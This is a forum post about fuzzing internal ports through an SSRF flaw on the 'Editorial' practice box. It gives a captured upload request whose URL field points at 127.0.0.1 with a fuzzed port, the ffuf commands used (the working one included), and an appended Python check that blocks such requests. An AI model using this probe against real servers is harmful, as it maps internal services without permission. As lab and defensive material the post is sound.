Hello everyone,
I’m having trouble fuzzing internal ports before launching an SSRF attack on the “Editorial” box. To do this, I’m fuzzing the entire request captured from Burp, saved to a text file named “request.txt”, which contains the following:
POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------283338384034137401052693891016
Content-Length: 363
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------283338384034137401052693891016
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:FUZZ
-----------------------------283338384034137401052693891016
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------283338384034137401052693891016--
And the ffuf command I am using goes like this:
ffuf -ac -request request.txt -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt:FUZZ -t 10
However, after running this command, I’m not getting any usable output. Every request seems to be erroring out, but I can’t pinpoint exactly what’s going wrong. Could someone help me figure out what I might be missing?
Thanks! <3
EDIT: I have managed to get it working with the following command:
ffuf -ac -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt:FUZZ -u http://editorial.htb/upload-cover -request request.txt
Apparently, the probable reason why it worked after specifying the URL manually is that when I use the -request flag only, ffuf doesn’t automatically extract the URL from the request file. In other words, the request file is most likely used to modify the body or headers of the request, but not the actual destination URL unless explicitly passed. That’s a bit strange, but at least I have learned something new and useful from this failure.
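The bookurl field in the request above is the SSRF sink: the server fetches whatever URL it is handed, which is why a loopback address with a fuzzed port reveals internal services. On the application side the mitigation is to validate the destination before fetching it. The following is an added example, not code from the post or from the Editorial box; the allowed-port set is an assumption, and the resolver is injectable so the check can be exercised offline with a constructed lookup table.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # assumption: cover images only come from ordinary web servers


def system_resolver(host):
    """Return every A/AAAA address the system resolver gives for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_fetch_url(url, resolve=system_resolver):
    """Decide whether the server may fetch url on a user's behalf.
    Returns (ok, reason, pinned_ip); connect to pinned_ip rather than
    resolving again, so DNS rebinding cannot swap in an internal address."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError as exc:
        return False, f"unparseable url or port: {exc}", None
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}", None
    if not parts.hostname:
        return False, "missing host", None
    if parts.username is not None or parts.password is not None:
        return False, "credentials in url", None
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}", None
    try:
        addrs = resolve(parts.hostname)
    except OSError as exc:  # socket.gaierror is a subclass of OSError
        return False, f"dns failure: {exc}", None
    if not addrs:
        return False, "name resolved to no addresses", None
    # Every record must be public; one internal record among public ones would steer the fetcher inside.
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"resolver returned a non-address: {addr!r}", None
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped  # unwrap ::ffff:127.0.0.1 so the IPv4 checks apply
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False, f"destination not public: {ip}", None
    return True, "ok", addrs[0]
```

With the default resolver the check covers hostnames as well as literals, so http://localhost:80/ is rejected just like http://127.0.0.1:80/.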